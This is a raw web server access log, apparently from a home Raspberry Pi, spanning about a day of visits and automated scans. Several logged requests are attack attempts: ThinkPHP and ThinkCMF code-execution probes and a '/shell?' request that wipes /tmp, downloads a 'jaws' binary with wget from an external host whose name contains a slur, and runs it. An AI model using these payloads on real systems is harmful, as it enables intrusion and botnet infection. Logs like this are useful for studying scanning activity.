Sat Feb 15 06:25:06 MST 2020 06:25:06 up 14 days, 18:28, 1 user, load average: 0.33, 0.24, 0.41 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 14days 11:27 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 222.186.19.221 - - [15/Feb/2020:13:28:50 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 2.179.111.248 - - [15/Feb/2020:14:06:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 92.112.61.106 - - [15/Feb/2020:15:16:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 61.219.11.153 - - [15/Feb/2020:16:03:26 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 74.214.229.223 - - [15/Feb/2020:16:24:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [15/Feb/2020:16:24:53 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [15/Feb/2020:16:26:03 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [15/Feb/2020:16:26:18 +0000] "GET /delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/ HTTP/1.1" 200 25000 "http://162.250.19.7/delinquent-accounts/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [15/Feb/2020:16:26:44 +0000] "GET /delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/Inv-FC-615.prn HTTP/1.1" 200 1534 "http://162.250.19.7/delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [15/Feb/2020:16:28:02 +0000] "GET /videos/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 151.72.31.226 - - [15/Feb/2020:17:32:43 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.101.0.209 - - [15/Feb/2020:18:33:00 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [15/Feb/2020:18:34:00 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [15/Feb/2020:18:34:03 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [15/Feb/2020:18:34:50 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 187.190.254.34 - - [15/Feb/2020:18:44:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 109.94.112.164 - - [15/Feb/2020:20:52:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 167.86.114.167 - - [15/Feb/2020:21:39:34 +0000] "GET / HTTP/1.1" 200 25000 "" "" 96.246.120.142 - - [15/Feb/2020:22:31:58 +0000] "GET / HTTP/1.1" 400 0 "" "" 140.249.20.167 - - [15/Feb/2020:23:51:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 140.249.20.167 - - [15/Feb/2020:23:51:17 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:36:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 152.136.67.176 - - [16/Feb/2020:00:37:01 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:01 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:02 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:02 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:04 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:05 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:05 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:06 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 152.136.67.176 - - [16/Feb/2020:00:37:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 36.239.129.231 - - [16/Feb/2020:00:56:31 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 36.239.129.231 - - [16/Feb/2020:00:56:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 80.22.48.157 - - [16/Feb/2020:02:36:54 +0000] "GET / HTTP/1.1" 400 0 "" "" 173.0.98.101 - - [16/Feb/2020:03:11:10 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 120.78.157.152 - - [16/Feb/2020:03:15:33 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 58.147.148.98 - - [16/Feb/2020:04:25:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 211.21.191.41 - - [16/Feb/2020:04:32:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 83.97.20.33 - - [16/Feb/2020:07:14:51 +0000] "GET / HTTP/1.1" 400 0 "" "" 128.14.134.170 - - [16/Feb/2020:07:16:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 139.162.106.181 - - [16/Feb/2020:07:19:37 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 193.33.38.88 - - [16/Feb/2020:07:51:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 181.40.108.95 - - [16/Feb/2020:08:36:29 +0000] "GET / HTTP/1.1" 400 0 "" "" 176.115.248.138 - - [16/Feb/2020:11:24:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 193.106.244.222 - - [16/Feb/2020:11:31:26 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 49.235.24.64 - - [16/Feb/2020:12:22:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 49.235.24.64 - - [16/Feb/2020:12:22:35 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:36 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:37 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:38 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:39 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:39 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:40 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:42 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 49.235.24.64 - - [16/Feb/2020:12:22:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 81.163.249.7 - - [16/Feb/2020:12:34:26 +0000] "GET / HTTP/1.1" 400 0 "" "" 103.79.78.40 - - [16/Feb/2020:12:44:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" Sun Feb 16 06:25:13 MST 2020 06:25:13 up 15 days, 18:28, 1 user, load average: 0.42, 0.29, 0.44 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 15days 12:03 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE